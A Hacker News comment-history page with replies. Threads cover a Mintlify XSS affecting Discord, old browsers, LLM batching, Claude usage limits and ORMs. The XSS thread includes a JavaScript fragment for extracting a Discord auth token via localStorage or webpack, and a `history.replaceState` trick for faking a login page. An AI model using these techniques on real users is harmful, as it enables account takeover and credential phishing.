Hacker Newsnew | past | comments | ask | show | jobs | submit | superasn's commentslogin

This works amazing well. I started playing and just 5 minutes in, I was completely hooked and ended up playing for almost half hour.

It could be that I'm a bit old-school, but this really seemed to confirm that ready to play fun gameplay trumps realistic graphics any day!


Vice City was originally planned as an add-on to GTA III. Development time was 18 months. Incredible that they put out such a great game in so little time.

Pushing the nostalgic effect aside, I agree. The gameplay is the important part and is why I can still play snes games to this day.

This is a pretty scary exploit, considering how easily it could be abused.

Imagine just one link in a tweet, support ticket, or email: https://discord.com/_mintlify/static/evil/exploit.svg. If you click it, JavaScript runs on the discord.com origin.

Here's what could happen:

- Your Discord session cookies and token could be stolen, leading to a complete account takeover.

- read/write your developer applications & webhooks, allowing them to add or modify bots, reset secrets, and push malicious updates to millions.

- access any Discord API endpoint as you, meaning they could join or delete servers, DM friends, or even buy Nitro with your saved payment info.

- maybe even harvest OAuth tokens from sites that use "Login with Disord."

Given the potential damage, the $4,000 bounty feels like a slap in the face.

edit: just noticed how HN just turned this into a clickable link - this makes it even scarier!


Doesn't stealing the cookies/token require a non-HTTP-only session cookie or a token in localstorage? Do you know that Discord puts their secrets in one of those insecure places, or was it just a guess?

I believe if you always keep session cookies in secure, HTTP-only cookies, then you are more resilient to this attack.

I interviewed frontend devs last year and was shocked how few knew about this stuff.


In general if a script can run, users sessions and more importantly passwords are at risk.

It's true that an HTTP-only session cookie couldn't be directly taken, but it's trivial to present the user with a login screen and collect their password (and OTP), at which point you can easily get a session remotely. It can look entirely like the regular login page right down to the url path (because the script can modify that without causing a page load).


Yep, httpOnly cookies just give the hacker a bit of extra work in some situations. TBH I don't even think httpOnly is worth the hassle it creates for platform developers given how little security it adds.

Wow did not realize a url could be set like that without promoting a page reload...

To be clear only the path and query parameters part of the url can change, the domain (or sub domain) stays intact.

Even scarier to me than the vulnerability is that Fidelity (whom I personally think is a good bank and investment company) was using a third party that allowed injection that could potentially steal a whole lot of money, affect markets, ruin or terminate billions of lives, and affect the course of humanity. What the fuck.

Their knowledge of finance is certainly better than their knowledge of web tech.

Historically and today.


That’s why I’m a Schwab junkie… but finance is a hotspot for this kind of stuff.

If it weren't already in the same domain you wouldn't be able to read a non-HttpOnly cookie anyway, so that's moot.

Well that's how SPAs work (single page applications)

How do you modify the url exactly?


`history.replaceState(null, "", "/login")`

For Coinbase docs, this is a disaster particularly

By they looks of it their docs are under a subdomain, and no part of the domain can be changed when setting the url this way. So it would still look a little out of place at least.

I mean, you're not wrong, but this is going to trick a non-zero number of people and that's not okay. We should expect more out of companies like Coinbase and hold them to a high standard.

This is unacceptable and the amount offered in general is low. It feels like we can agree on this.


auth URLs are almost always a shitshow in every larger corp. Having the url be https://docs.bigcorp.com/sso/authlayerv1/us-east-24/aws/secu... would not stand out at all to anyone.

No because Discord auth tokens dont expire soon enough. The only thing that kills them is changing your password. Idk why Discord doesnt invalidate them after some time, it is seriously amateur hour over there and has been for a while.

Probably because the end user hates login in, my friends always complain about the “remember me” button being useless for some services.

No, these are tokens that you get a new one per request, if you open up dev tools, and open the user settings panel, you will see that you get a new one every single time you open the user settings panel. They never expire, at least for years they were insanely long lasting.

if you set the cookier header right (definitely not always the case), this is true, but the javascript can still send requests that will have that cookie included, effectively still letting the hacker use the session as the logged in user

with http-only they can't _steal_ the cookie, but they can still _use_ the cookie. It reduces the impact but doesn't fully solve it.

Discord puts the authentication token in local storage

Is that a problem on its own? It's like, encrypted right? Maybe a time sensitive token?

Not a problem in itself. Also, there's not much point of encrypting tokens. The attacker could use the encrypted token to authenticate themselves without having to decrypt. They could just make a request from the victim's own browser. They could do this with cookies too even with httpOnly cookies.

XSS is a big problem. If a hacker can inject a script into your front end and make it execute, it's game over. Once they get to that point, there's an infinite number of things they can do. They basically own the user's account.


Does anyone actually encrypt the contents of JWTs? I'd have thought that anyone who has concerns about the contents of the token being easily visible would be likely to avoid JWTs anyway and just use completely opaque tokens?

Encrypted tokens are opaque but they are also offline-verifiable. A simple opaque token has to be verified online (typically, against a database) whenever it's used.

Auth0, for example, supports JWE for its access tokens: https://auth0.com/docs/secure/tokens/access-tokens/json-web-...


JWT supports some encryption algorithms as an alternative to signatures but my experience is that most people like to keep it simple.

JWT is intended for authentication. Most of the time you're basically just signing a token containing an account ID and nothing else... Sometimes a list of groups but that only scales to a small number of groups.


Depends on the token; JWTs usually have payloads that are only base64 encoded. As well, if there's a refresh token in there it can be used to generate more tokens until invalidated (assuming invalidation is built in).


You may be thinking of CSRF mitigations. XSS exploits are more dangerous and can do more than steal sessions.

As a FE dev, I wouldn't be able to articulate what you just did in the way you did, but it is something I know in practice, just from experience. I don't think any of the FE courses I took tackled anything like that.

Token stealing hasn't been a real danger for a decade now. If you don't mark your token's as non-HTTP you're doing something explicitely wrong, because 99% of backends nowadays do this for you.

with http-only they can't _steal_ the cookie, but they can still _use_ the cookie. It reduces the impact but doesn't fully solve it.

Surely, if a script is in a position to sniff the cookie from local storage, they can also indirectly use the http-only cookie by making a request from the browser. So really not much of a difference as they will be taking over the account

The cookie storage and the local storage by all means is not the same! Cookies are not stored in the local storage and could be httpOnly, so they are not directly accessible by JavaScript. Nevertheless, as described above, with this XSS attack it is easy to bypass the token and just steal the user credentials by pretending a fresh login mask keeping the origin domain intact. That's why XSS attacks are dangerous since existence. Nothing new actually.

The fact that it is just so trivial and obvious that its scary. It didn't even require any real hacking chops, just patience: literally anyone with a cursory knowledge of site design could have stumbled on this if they were looking at it.

Terrifying.


>the $4,000 bounty feels like a slap in the face.

And serves a reminder crime does pay.

In the black market, it would have been worth a bit more.


I was once only given $1,000 for an exploit where I could put in npm usernames and get their email addresses. Big corps don't always pay what they should.

yeah, but nothing pays as much as doing free work for (checks notes) mintlify feels

No it would not have been.

This specific XSS vulnerability may not have been, but the linked RCE vulnerability found by their friend https://kibty.town/blog/mintlify/ certainly would've been worth more than the $5,000 they were awarded.

A vulnerability like that (or even a slightly worse XSS that allowed serving js instead of only svg) could've let them register service workers to all visiting users giving future XSS ability at any time, even after the original RCE and XSS were patched.


Maybe? I don't know enough about the vulnerability. Is it serverside? Then it isn't worth very much.

>i quickly realised that this was the server-side serverless (lol) environment of their main documentation app, while this calls to a external api to do everything, we have the token it calls it with in the env.

>alongside, we can poison the nextjs cache for everyone for any site, allowing mass xss, defacing, etc on any docs site.


So it's a serverside bug that basically creates a more-severe stored DOM corruption vulnerability? Yeah, that's not worth anything to any buyer of vulnerabilities that I know exists. Maybe you know ones that I don't know.

I can’t speak to the value of the vulnerability as I lack the universal Rolodex of Every Exploit Buyer that is apparently available (nor am I interested in debating this with somebody that admitted they didn’t know anything about the vulnerability, declared it worthless anyway, and then moved the goalposts after a core assumption about it was trivially shown to be wrong. I’m fairly certain at this point these kids could recreate the end of the movie Antitrust and there’d be a thread somewhere with tptacek posting “This isn’t that big of a deal because”).

I just saw that you asked if the article about the server-side exploit was about a server-side exploit. It is. It’s right there in the post.


Can I ask which exploit buyers you are aware of? None of us know all of them! It'll be easier to discuss this with a specific buyer in mind.

Could you elaborate on why not?

What 'arcwhite said (sorry, I got dragged into a call).

1. The exploits (not vulnerabilities; that's mostly not a thing) that command grey/black market value all have half-lives.

2. Those exploits all fit into existing business processes; if you're imagining a new business, one that isn't actively running right now as we speak (such as you'd have to do to fit any XSS in a specific service), you're not selling an exploit; you're planning a heist.

3. The high-dollar grey market services traffic exclusively in RCE (specifically: reliable RCE exploits, overwhelmingly in mainstream clientside platforms, with sharp dropoffs in valuation as you go from e.g. Chrome to the next most popular browser).

4. Most of the money made in high-ticket exploit sales apparently (according to people who actually do this work) comes on the backend, from tranched maintenance fees.


There's generally no grey market for XSS vulns. The people buying operationalized exploits generally want things that they can aim very specifically to achieve an outcome against a particular target, without that target knowing about it, and operationalized XSS vulns seldom have that nature.

Your other potential buyers are malware distributors and scammers, who usually want a vuln that has some staying power (e.g. years of exploitability). This one is pretty clearly time-limited once it becomes apparent.


It would have been. Ten times the amount at least.

For a reflected XSS? Tell me who is paying that much for such a relatively common bug...

To elaborate, to exploit this you have to convince your target to open a specially crafted link which would look very suspect. The most realistic way to exploit would be to send a shortened link and hope they click on it, that they are logged into discord.com when they do (most people use the app), that there are no other security measures (httponly cookies) etc

No real way to use this to compromise a large amount of users without more complex means


It isn't about the commonality of the bug, but the level of access it gets you on the type or massive scale of the target. This bug you your blog? Who cares. This bug on Discord or AWS? Much more attractive and lucrative.

Yes, but this is not a particularly high access level bug.

Depending on the target, it's possible that the most damage you could do with this bug is a phishing attack where the user is presented a fake sign-in form (on a sketchy url)

I think $4k is a fair amount, I've done hackerone bounties too and we got less than that years ago for a twitter reflected xss


Why would that be the maximum damage ? This XSS is particularly dangerous because you are running your script on the same domain where the user is logged-in so you can pretty much do anything you want under his session.

In addition this is widespread. It's golden for any attacker.


Because modern cookie directives and browser configs neuter a lot of the worst XSS outcomes/easiest exploit paths. I would expect all the big sites to be setting them, though I guess you never know.

I would not be that confident as you can see: on their first example, they show Discord and the XSS code is directly executed on Discord.com under the logged-in account (some people actually use web version of Discord to chat, or sign-in on the website for whatever reason).

If you have a high-value target, it is a great opportunity to use such exploits, even for single shots (it would likely not be detected anyway since it's a drop in the ocean of requests).

Spreading it on the whole internet is not a good strategy, but for 4000 USD, being able to target few users is a great value.

Besides XSS, phishing has its own opportunity.

Example: Coinbase is affected too though on the docs subdomain and there are 2-step, so you cannot do transactions directly but if you just replace the content with a "Sign-in to Coinbase / Follow this documentation procedure / Download update", this can get very very profitable.

Someone would pay 4000 USD to receive 500'000 USD back in stolen bitcoins).

Still, purely with executing things under the user sessions there are interesting things to do.


> some people actually use web version of Discord to chat, or sign-in on the website for whatever reason

Beside this security blunder on Discord’s part, I can see only upsides to using a browser version rather than an Electron desktop app. Especially given how prone Discord are to data mining their users, it seems foolish to let them out of the web sandbox and into your system


Again, here you have not so much sold a vulnerability as you have planned a heist. I agree, preemptively: you can get a lot of money from a well-executed heist!

Do you want to execute actions as logged-in user on high-value website XXX ?

If yes -> very useful


Nobody is disputing that a wide variety of vulnerabilities are "useful", only that there's no market for most of them. I'd still urgently fix an XSS.

There is a market outside Zerodium, it's Telegram. Finding a buyer takes time and trust, but it has definitively higher value than 4k USD because of its real-world impact, no matter if it is technically lower on the CVSS scores.

Really? Tell me a story about someone selling an XSS vulnerability on Telegram.

("The CVSS chart"?)

Moments later

Why do people keep bringing up "Zerodium" as if it's a thing?


I understand your perspective about the technical value of an exploit, but I disagree with the concept that technical value = market value.

There are unorganized buyers who may be interested if they see potential to weaponize it.

In reality, if you want to maximize revenue, yes, you need to organize your own heist (if that's what you meant)


Do you know this or do you just think it should be true?

> understand your perspective about the technical value of an exploit

Going out on the world’s sturdiest limb and saying u/tptacek knows the technical and trading sides of exploits. (Read his bio.)


AIU this feature is SSS, not XSS, so XSS protections don't apply.

How would you make money from this? Most likely via phishing. Not exactly a zero-click RCE.

What happens in all these discussions is that we stealthily transition from "selling a vulnerability" to "planning a heist", and you can tell yourself any kind of story about planning a heist.

Also the XSS exploit would have been dead in the water for any sites using CSP headers. Coinbase certainly uses CSP. With this in place an XSS vuln can't inject arbitrary JS.

I don't like tptacek, but it's insane to not back up this comment with any amount of evidence or at least explanation. The guy knows his shit.

Hey I was wrong about Apple downthread.

> - Your Discord session cookies and token could be stolen, leading to a complete account takeover.

Discord uses HttpOnly cookies (except for the cookie consent banner).


tokens are stored in localStorage, which is accessible by JS

Well, it used to be much more accessible before, now you have to do some hack to retrieve it, and by hack, I mean some "window.webpackChunkdiscord_app.push" kinda hack, no longer your usual retrieval. Basically you have to get the token from webpack. The localStorage one does not seem to work anymore. That is what I used, but now it does not work (or rather, not always). The webpack one seems to be reliably good.

So your code goes like:

  // Try localStorage first
  const token = getLocalStorageItem('token')
  if (token) return token

  // Try webpack if localStorage fails
  const webpackToken = await getTokenFromWebpack()
  if (webpackToken) return webpackToken
and localStorage does fail often now. I knew the reason for that (something about them removing it at some point when you load the website?) so you need the webpack way, which is consistently reliable.

I believe if you search for the snippet above, you can find the code for the webpack way.


Discord removes the token from localStorage when the web app is open and it's in app memory, and places it back when you close the tab using the "onbeforeunload" event.

Yeah, that is what I have observed, too.

You can retrieve it the webpack way though.


Great job on this release! I've been waiting for something like it since my favorite browser, Kiwi, stopped getting updates.

Without updates, many sites will likely stop working with it soon.

Kiwi had some great features, like disabling AMP mode, rearranging the Chrome Store for mobile, and customizable tab layouts, etc. These features might interest others as well.


I miss kiwi.


Yes I'd be interested too. I'm still using Kiwi browser but afraid it will stop working anytime soon.

I did recently see this browser is unsafe when trying to open Gmail in it, so any chromium based update to date alternative there would be amazing!


I still (unfortunately) am stuck with kiwi as well. I use it almost exclusively for a few webapps that use large amounts of indexeddb storage (>10gb) without a working export method[1]. With Firefox, I was able to export this data with devtools over ADB[2] to another Firefox install.

I really wish someone would create an indexeddb shim that interfaces with another system and only uses indexeddb for (very large) cache. Something I could drop in with a userscript would be lovely, even if it required running a local server with something like rsync or rclone responsible for the actual transfers.

[1]: dexie import export used to work, now it never returns. I have no way of verifying that it's doing nothing without putting it in background (thus suspending it...), but I've let it run 3 hours with no results. [2]: Firefox doesn't allow backing up app data for some reason but devtools functions allow reading and writing the profile directory through the use of terminal commands (zip profile directory, unzip and restart browser).


I agree with this take, Product Hunt felt like it was chasing short term goals instead of building something sustainable They also allowed and sometimes encouraged behavior that undermined the quality of the site

The last time I used it one of the common hacks was adding 50 makers to a single app launch PH also openly condoned mass email blasts and tweets to drive votes which just rewarded whoever could push the hardest on promotion

In contrast Hacker News discourages asking people for upvotes and even treats it as a negative if you do That longterm focus on signal over hype is probably why HN still feels useful today while PH lost its way


Thanks for the helpful reply! As I wasn't able to fully understand it still, I pasted your reply in chatgpt and asked it some follow up questions and here is what i understand from my interaction:

- Big models like GPT-4 are split across many GPUs (sharding).

- Each GPU holds some layers in VRAM.

- To process a request, weights for a layer must be loaded from VRAM into the GPU's tiny on-chip cache before doing the math.

- Loading into cache is slow, the ops are fast though.

- Without batching: load layer > compute user1 > load again > compute user2.

- With batching: load layer once > compute for all users > send to gpu 2 etc

- This makes cost per user drop massively if you have enough simultaneous users.

- But bigger batches need more GPU memory for activations, so there's a max size.

This does makes sense to me but does this sound accurate to you?

Would love to know if I'm still missing something important.


This seems a bit complicated to me. They don't serve very many models. My assumption is they just dedicate GPUs to specific models, so the model is always in VRAM. No loading per request - it takes a while to load a model in anyway.

The limiting factor compared to local is dedicated VRAM - if you dedicate 80GB of VRAM locally 24 hours/day so response times are fast, you're wasting most of the time when you're not querying.


Loading here refers to loading from VRAM to the GPUs core cache, loading from VRAM is extremely slow in terms of GPU time that GPU cores end up idle most of the time just waiting for more data to come in.


Thanks, got it! Think I need a deeper article on this - as comment below says you'd then need to load the request specific state in instead.


Yeah chatgpt pretty much nailed it.


But you still have to load the data for each request. And in an LLM doesnt this mean the WHOLE kv cache because the kv cache changes after every computation? So why isnt THIS the bottleneck? Gemini is talking about a context window of a million tokens- how big would the kv cache fir this get?


Pretty sure this is there to prevent this[1] from happening to them

[1] https://www.viberank.app/


That's a CO2 emissions leader board!


That’s almost no CO2 emissions at all. Here is a CO2 emissions leaderboard (need to sort by the correct column): https://celebrityprivatejettracker.com/leaderboard/


The number one has 32k which is equivellent of 64,000 commercial transantlantic flight trips (per person). For reference, 2024 had a record flights summer of 140k.


A commercial transatlantic flight costs $0.50 per person?


For a moment I thought it might be the presidential plane, which would explain the emissions, but no, for some reason Trump's personal plane is a whole ass Boring 757


I'm surprised there hasn't been dick swinging pressure for some billionaire (the type who cant remember how many billions but net worth probably begins with a 1 due to Benford's law) to get a dreamliner as their private jet.


Inference != training


Oh my god. That's insane.

The anti-AI people would be pulling their pitchforks out against these people.

Would there be any way of compiling this without people's consent? Looking at GitHub public repos, etc.?

I imagine a future where we're all automatically profiled like this. Kind of like perverse employee tracking software.


The pro-AI people are as well, as these people are all on the Claude Max plan, and they’re just burning through resources for internet lols, while ruining the fun for the rest of us. It’s the tragedy of the commons at work.


I like the concept but the landing page is not good and too heavy.

My browser just froze after scrolling half-way. Not sure if this is something to do with the scroll fx but i really don't understand why this simple site is maxing out my CPUs.


Same. Using Mobile Safari on iPadOS on an M2 iPad Pro.


I'm not a fan of usage caps either, but that Reddit post [1] (“You deserve harsh limits”) does highlight a perspective worth considering.

When some users burn massive amounts of compute just to climb leaderboards or farm karma, it’s not hard to imagine why providers might respond with tighter limits—not because it's ideal, but because that kind of behavior makes platforms harder to sustain and less accessible for everyone else. Because on the other hand a lot of genuine customers are canceling because they get API overload message after paying $200.

I still think caps are frustrating and often too blunt, but posts like that make it easier to see where the pressure might be coming from.

[1] https://www.reddit.com/r/ClaudeAI/comments/1lqrbnc/you_deser...


lets not blame shift anthropic bait and switch to 'bad users' .

Surely they thought about 'bad users' when they released this product. They can't be that naive.

Now that they have captured developer mindshare. users are bad.


> anthropic bait and switch

what was the bait and switch? where in the launch announcement (https://www.anthropic.com/news/max-plan) did they suggest it provided unlimited inference?


so where did 'bad users' come from if users were simply doing what they were allowed to?

why is anthropic tweeting about 'naughty users that ruined it for everyone' ?


What are the commons? Why would a tragedy just appear there or of the blue?


I don't understand your comment.

they launched Claude Max (and Pro) as being limited. it was limited before, and it's limited now, with a new limit to discourage 24/7 maxing of it.

in what way was there a bait and switch?


are you going to answer what the bait and switch was?


Bait : "For 200$ a month you get to use Claude 20x more than what the Pro users are entitled to. You don't know how much exactly though, but neither do we. We may limit your usage with weekly and monthly limits. Sounds good?"

Switch: "We limited your usage weekly and monthly. You don't know how those limits were set, we do but that's not information you need to know. However instead of choosing to hoard your usage out of fear of hitting the dreaded limit again, you've kept it again and again, using the product exactly the way it was intended to and now look what you've done."


so there was no bait and switch, you are just complaining about the lack of transparency around the specific limits that they never once said didn't exist


Always use ORMs and then spend the next year debugging N+1 queries, bloated joins, and mysterious performance issues that only show up in prod.

Migrations randomly fail, schema changes are a nightmare, and your team forgets how SQL works.

ORMs promise to abstract the database but end up being just another layer you have to fight when things go wrong.


People love to rant about ORMs.

But as someone who writes both raw SQL and uses ORMs regularly, I treat a business project that doesn’t use an ORM as a bit of a red flag.

Here’s what I often see in those setups (sometimes just one or two, but usually at least one):

- SQL queries strung together with user-controllable variables — wide open to SQL injection. (Not even surprised anymore when form fields go straight into the query.)

- No clear separation of concerns — data access logic scattered everywhere like confetti.

- Some homegrown “SQL helper” that saves you from writing SELECT *, but now makes it a puzzle to reconstruct a basic query in a database

- Bonus points if the half-baked data access layer is buried under layers of “magic” and is next to impossible to find.

In short: I’m not anti-SQL, but I am vary of people who think they need hand-write everything in every application including small ones with a 5 - 50 simultaneous users.


People who avoid ORMs endup writing their own worse ORM*. ORMs are perfect if you know how and when to uses them. They encapsulate a lot of the mind numbing work that comes with raw sql such as writing inserts for a 50 column database.


100%. I once tried to optimize a SQL query, moving away from the ORM, so I can have more control of the query structure and performance.

I poorly implemented SOLID design principles, creating a complete mess of a SQL Factory, which made it impossible to reason about the query unless I had a debugger running and called the API directly.


I find that Claude writes boilerplate SQL very well, and is effectively an 'ORM' for me - I just get plain SQL for CRUD.

Complex queries I write myself anyway, so Claude fills the 'ORM' gap for me, leaving an easily understood project.


Writing is just half the job. Now try migrations, or even something as fundamental as ”find references” on a column name. No, grep is not sufficient, most tables have fields called ”id” or ”name”.


I did that once on a hobby project, accidentally. When I realized the corner I had painted myself into I abandoned it.


I'd say, pure SQL gives you a higher performance ceiling and a lower performance and security floor. It's one of these features / design decisions that require diligence and discipline to use well. Which usually does not scale well beyond small team sizes.

Personally, from the database-ops side, I know how to read quite a few ORMs by now and what queries they result in. I'd rather point out a missing annotation in some Spring Data Repository or suggest a better access pattern (because I've seen a lot of those, and how those are fixed) than dig through what you describe.


The best is when you use an orm in standard ways throughout your project and can drop down to raw sql for edge things and performance critical sections… mmmmm. :chefs kiss:


100%

If a dev thinks that all SQL can be written by hand then they probably haven’t worked with a complex application that relies on complex data.

A good question to ask them is: what problems do ORMs solve? Good answers are:

Schema Changes + migration

Security

Code Traceability (I have a DB field, where is it used)

Code Readability

Standardisation - easy hiring.

Separation of data layer logic and application layer logic.

Code organisation, most ORMs make you put methods that act on a table in a sensible place.


I like Django's ORM for good schema migration. Other "ORMs" people build do not often have a good story around that. So often it's because developers aren't experiencing the best ORMs they could.


Homegrown ORMs are universally terrible and a lot of the anti ORM crowd are really anti homegrown ORM.

I’ve used Django, SQLalchemy and Hibernate. All three have good migration stories.


I think people should go all-in on either SQL or ORMs. The problems you described usually stem from people who come from the ORM world trying to write SQL, and invariably introducing SQL injection vulnerabilities because the ORM normally shields them from these risks. Or they end up trying to write their own pseudo-ORM in some misguided search for "clean code" and "DRY" but it leads to homegrown magic that's flaky.


In Java, the sweet spot is JDBCTemplate. Projects based on JDBCTemplate succeed effortlessly while teams muddle through JPA projects.

It is not that JPA is inherently bad, it's just that such projects lack strong technical leadership.


I believe jOOQ is Java's database "sweet spot". You still have to think and code in a SQL-ish fashion (its not trying to "hide" any complexity) but everything is typed and it's very easy to convert returned records to objects (or collections of objects).


Sir, sqlc for example.

I know exactly what's going on, while getting some level of idiocy protection (talking about wrong column names, etc).


Poor developers use tools poorly, film at 11.

But seriously, yeah, every time I see a complaint about ORMs, I have to wonder if they ever wrote code on an "average team" that had some poor developers on it that didn't use ORMs. The problems, as you describe them, inevitably are worse.


ORMs can be the starting point to optimize the queries when they need it manually with SQL.

There's also the reality that no two ORMs may be built to the same way and performance standard.


I'm wary of people who are against query builders in addition to ORMs. I don't think it's possible to build complicated search (multiple joins, searching by aggregates, chaining conditions together) without a query builder of some sort, whether it's homegrown or imported. Better to pull in a tool when it's needed than to leave your junior devs blindly mashing SQL together by hand.

On the other hand, I agree that mapping SQL results to instances of shared models is not always desirable. Why do you need to load a whole user object when you want to display someone's initials and/or profile picture? And if you're not loading the whole thing, then why should this limited data be an instance of a class with methods that let you send a password reset email or request a GDPR deletion?


At least when I see raw sql I know me and the author are on a level playing field. I would rather deal with a directory full of sql statement that get run than some mysterious build tool that generates sql on the fly and thinks its smarter than me.

For example, I'm working on a project right now where I have to do a database migration. The project uses c# entity framework, I made a migration to create a table, realized I forgot a column, deleted the table and tried to start from scratch. For whatever reason, entity framework refuses to let go of the memory of the original table and will create migrations to restore the original table. I hate this so much.


You can use EF by writing the migrations yourself ("database first"). Also, whatever problem you have there seems to be easily fixed either by a better understanding of how EF's code generation works, or by more aggressive use of version control.


Their point is they understand sql and dbs. They shouldnt need to learn EF and all its footguns.


i think you should just create another migration with alter table that adds that column


all of this is solved by an sql query builder DSL


> - Some homegrown “SQL helper” that saves you from writing SELECT *, but now makes it a puzzle to reconstruct a basic query in a database

>- Bonus points if the half-baked data access layer is buried under layers of “magic” and is next to impossible to find.

It’s really funny because you’re describing an ORM perfectly.


I don't know what kind of ORM you have used but I probably wouldn't like it either.

My ORM does extremely much more than those "SQL helper" classes and it logs SQL nicely to the console or wherever I ask it to to log.

And it is easy to find it, just search for @Entity.


They're making the tongue-in-cheek observation that those who don't use an ORM end up reinventing one, poorly.


A bad ORM. Every application that accesses an SQL database contains an ad hoc, informally-specified, bug-ridden, slow implementation of half of an ORM.


You really want something that lets you write

  table=db.table("table1")
  table.insert({"col1": val1, "col2": val2})
at the very least, if you are really writing lots of INSERTs by hand I bet you are either not quoting properly or you are writing queries with 15 placeholders and someday you'll put one in the wrong place.

ORMs and related toolkits have come a long way since they were called the "Vietnam of Computer Science". I am a big fan of JooQ in Java

https://www.jooq.org/

and SQLAlchemy in Python

https://www.sqlalchemy.org/

Note both of these support both an object <-> SQL mapper (usually with generated objects) that covers the case of my code sample above, and a DSL for SQL inside the host language which is delightful if you want to do code generation to make query builders and stuff like that. I work on a very complex search interface which builds out joins, subqueries, recursive CTEs, you name it, and the code is pretty easy to maintain.


I always see this sentiment here but I just havent experienced any of it in 14 years with the Django ORM.


My life is this in django. Querysets have been passed around everywhere and we've grown to 50 teams. Now, faced with ever slower dev velocity due to intertwined logic, and reduced system performance with often wildly non performant data access patterns, we have spent two years trying to untangle our knot of data access, leading to a six month push requiring disruption to 80% of team's roadmaps to refactor to get the ORM objects not passed around, but to use plain types or DTOs, which will only then allow us to migrate a core part of our database which is required for both product development and scaling needs.

Here's the thing. In five of six companies I have worked at, this story is the exact same. Python, Ruby, Elixir. Passing around ORM objects and getting boundaries mixed leading to more interdependencies and slower velocities and poor performance until a huge push is required to fix it all.

Querysets within a domain seems fine, but when you grow, domains get redefined. Defining good boundaries is important. And requires effort to maintain.


I believe your case is not specific to Django ORM in particular but to the inherent complexity of various teams working together on a single project.

For greenfield projects, you have a chance of splitting the codebase into packages with each one having its own model, migrations and repository, and if you want to cross these boundaries, make it an API, not a Django model. For existing projects this is hard to do most of the time though.


One thing that's interesting about Django I thought was that tools like celery will "pickle" orm objects, when they really should be passing the pk's of the objects.

The other thing that's interesting about Django is that you can subclass queryset to do things like .dehydrate() and .rehyrdrate() which can do the translations between json-like data and orm representations.

Then replace the model manager (in Django at least) with that queryset using queryset.as_manager().

If you're trying to decompose the monolith, this is a good way to start -- since it allows you an easier time to decompose and recompose the orm data.

The simplest can just be:

    def dehydrate(self) -> List[int]:
        return list(self.values_list("id", flat=True))

    def rehydrate(self, *pks) -> Self:
        return self.filter(id__in=pks)


> 50 teams

At that scale any tool will break down without good architecture, ORM or not.


You've never had to use

  .extra()

?


Django has SQL logging so you can see what your queries will do! It's wild.


Hitting the database should be avoided in a web application, and use keys as much as possible. All heavy objects should be previously cached in disk.


That sounds like an awesome idea for a new, post-React web framework. Instead of simply packaging up an entire web SPA "application" and sending it to the client on first load, let's package the SPA app AND the entire database and send it all - eliminating the need for any server calls entirely. I like how you think!


I can unironically imagine legitimate use cases for this idea. I’d wager that many DBs could fit unnoticed into the data footprint of a modern SPA load.


Yes, probably a lot of storefronts could package up their entire inventory database in a relatively small (comparatively) JSON file, and avoid a lot of pagination and reloads. Regardless, my comment was, of course, intended as sarcasm.


Stream the db to the clients post page load and validate client requests against a cache on the server.


Make sure to post this idea all over the internet so that LLMs learn it and it will be even easier to exploit vibe-coded websites.


I like Ecto's approach in Elixir. Bring SQL to the language to handle security, and then build opt-in solutions to real problems in app-land like schema structs and changesets. Underneath, everything is simple (e.g. queries are structs, remain composable), and at the driver layer it taks full advantage of the BEAM.

It's hard to find similarly mature and complete solutions. In the JS/TS world, I like where Drizzle is going, but there is an unavoidable baseline complexity level from the runtime and the type system (not to criticize type systems, but TS was not initially built with this level of sophistication in mind, and it shows in complexity, even if it is capable).


Ecto is a gold-standard ORM, in no small part because it doesn't eat your database, nor your codebase. It lives right at the intersection, and does it's job well.


A couple of years ago I had an opportunity to fill a fullstack role for the first time in several years.

First thing I noticed was that I couldn't roll an SQL statement by hand even though I had a distinct memory of being able to do so in the past.

I went with an ORM and eventually regretted it because it caused insurmountable performance issues.

And that, to me, is the definition of a senior engineer: someone who realised that they've already forgotten some things and that their pool of knowledge is limited.


ORMs are absolutely fantastic at getting rid of the need for CRUD queries and then boilerplate code for translating a result set to a POCO and vide versa. They also allow you to essentially have a strongly typed database definition. It allows you to trivialise db migrations and versioning, though you must learn the idiosyncrasies.

What they are not for is crafting high performance query code.

It literally cannot result in insurmountable performance issues if you use it for CRUD. It's impossible because the resulting SQL is virtually identical to what you'd write natively.

If you try to create complex queries with ORMs then yes, you're in for a world of hurt and only have yourself to blame.

I don't really understand people who still write basic INSERT statements. To me, it's a complete waste of time and money. And why would you write such basic, fiddly, code yourself? It's a nightmare to maintain that sort of code too whenever you add more properties.


Plenty of tools out here doing plain sql migrations with zero issues.

At my day job everyone gave up on attempting to use the awkward ORM dsl to do migrations and just writes the sql. It’s easier, and faster, and about a dozen times clearer.

> I don't really understand people who still write basic INSERT statements

Because it’s literally 1 minute, and it’s refreshingly simple. It’s like a little treat! An after dinner mint!

I jest, I’m not out here hand rolling all my stuff. I do often have semi-involved table designs that uphold quite a few constraints and “plain inserts” aren’t super common. Doing it in sql is only marginally more complex than the plain-inserts, but doing them with the ORM was nightmarish.


> It’s like a little treat! An after dinner mint!

You completely changed my perspective on simple SQL housekeeping. https://m.youtube.com/watch?v=qYPW3O6VhXo&t=48s


My definition of a senior engineer is someone who can think of most of the ways to do a thing... and has the wisdom to chose the best one, given the specific situation’s constraints.


Perhaps because databases were fundamental to the first programs I ever built (in the ancient 19xx's), but damn, I cannot believe how many so-called experienced devs - often with big titles and bigger salaries - cannot write SQL. It's honestly quite shocking to me. No offense, but wow.


Thing is, this used to be trivial to me, but I spent several years in a purely frontend role, so didn't interact directly with databases at all.

Moreover, the market promotes specialization. The other day I had a conversation with a friend who is rather a generalist and we contrasted his career opportunities with those of a person I know who started out as a civil engineer, but went into IT and over the course of about four years specialized so heavily in Angular, and only that, that now makes more than the two of us combined.

He can't write an SQL statement - I'm not sure he was ever introduced to the concept. How does that feel?


This is a common sentiment because so many people use ORMs, and because people are using them so often they take the upsides for granted and emphasise the negatives.

I've worked with devs who hated on ORMs for performance issues and opted for custom queries that in time became just as much a maintenance and performance burden as the ORM code they replaced. My suspicion is the issues, like with most tools, are a case of devs not taking the time to understand the limits and inner workings of what they're using.


This fully matches my experience, and my conclusions as well. I'd add that I often don't get to pick whether the logic will be more on the ORM side, or on the DB side. I end up not caring either - just pick a side. Either the DB be dumb and the code be smart, or the other way around. I don't like it when both are trying to be smart - that's just extra work, and usually one of them fighting the other.


The reason why I dislike ORMs is that you always have to learn a custom DSL and live in documentation to remember stuff. I think AI has more context than my brain.

Sql does not really needs fixing. And something like sqlc provides a good middle ground between orms and pure sql.


There is a solution engineered specifically for avoiding N+1 queries and overfetching: GraphQL.

More specifically a GraphQL-native columnar database such as Dgraph, which can leverage the query to optimize fetching and joining.

